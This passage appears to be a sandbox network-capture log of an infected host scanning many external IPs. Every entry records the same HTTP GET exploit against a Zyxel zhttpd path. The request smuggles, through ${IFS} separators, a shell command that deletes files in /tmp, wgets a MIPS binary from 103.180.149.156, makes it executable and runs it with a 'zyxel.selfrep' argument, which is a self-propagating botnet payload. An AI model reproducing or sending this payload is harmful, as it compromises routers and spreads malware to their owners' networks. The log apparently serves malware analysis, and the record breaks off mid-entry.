                                                        Feb 2, 2024 06:20:54.625163078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        515192.168.2.143478874.11.223.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625195980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        516192.168.2.1460140105.253.182.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625261068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        517192.168.2.1434198145.53.234.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625288963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        518192.168.2.1435550184.168.224.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625338078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        519192.168.2.144162288.195.161.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625390053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        520192.168.2.1444612100.225.69.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625416994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        521192.168.2.144062817.25.6.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625452995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        522192.168.2.143844873.252.10.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625477076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        523192.168.2.1438568174.98.11.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625513077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        524192.168.2.144667490.111.92.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625535011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        525192.168.2.1443624108.56.248.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625588894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        526192.168.2.1432824122.232.219.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625616074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        527192.168.2.1449256186.22.122.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625670910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        528192.168.2.144787496.3.86.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625708103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        529192.168.2.1434860185.132.89.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625729084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        530192.168.2.1442258216.202.210.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625773907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        531192.168.2.1454108115.74.144.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625797033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        532192.168.2.1440830165.79.18.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625859022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        533192.168.2.1460994150.17.191.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625900984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        534192.168.2.145080095.173.192.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625932932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        535192.168.2.1441878152.178.26.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625997066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        536192.168.2.1448430160.246.154.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626038074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        537192.168.2.146017454.57.80.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626077890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        538192.168.2.1444352192.125.229.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626116037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        539192.168.2.143286457.207.48.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626177073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        540192.168.2.1458470144.74.135.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626204967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        541192.168.2.144469698.52.212.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626241922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        542192.168.2.1434048114.63.224.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626297951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        543192.168.2.1441216136.243.179.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626331091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        544192.168.2.1446292108.3.90.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626360893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        545192.168.2.1455254221.253.192.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626408100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        546192.168.2.1450982166.179.67.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626431942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        547192.168.2.144789288.43.135.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626465082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        548192.168.2.1436148166.47.194.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626507998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        549192.168.2.1460980147.207.154.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626533031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        550192.168.2.145411460.107.2.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626563072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        551192.168.2.1445800181.84.49.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626600027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        552192.168.2.1457504175.157.118.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626626968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        553192.168.2.145986073.118.64.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626684904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        554192.168.2.1451254141.218.233.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626729965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        555192.168.2.144973457.176.50.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626754045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        556192.168.2.1433920101.123.194.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626795053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        557192.168.2.144280034.58.124.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626812935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        558192.168.2.1454866170.242.51.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626843929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        559192.168.2.145700844.216.59.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626893997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        560192.168.2.1450916139.91.192.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626925945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        561192.168.2.144443890.99.175.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.626972914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        562192.168.2.1436546110.56.136.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627006054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        563192.168.2.144968651.116.28.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627053022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        564192.168.2.144684014.10.231.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627099991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        565192.168.2.1435796100.136.90.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627140999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        566192.168.2.1453136199.163.182.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627173901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        567192.168.2.143805299.56.237.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627207994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        568192.168.2.1433096117.148.126.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627243996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        569192.168.2.1435524120.213.23.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627298117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        570192.168.2.1445564158.14.213.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627331018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        571192.168.2.1447142197.29.106.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627373934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        572192.168.2.145469812.97.146.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627405882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        573192.168.2.144662253.195.106.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627429008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        574192.168.2.145308081.97.216.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627460003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        575192.168.2.145564649.49.109.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627522945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        576192.168.2.144929479.43.247.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627573967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        577192.168.2.14585748.210.2.41443
                                                        TimestampBytes transferredDirectionData
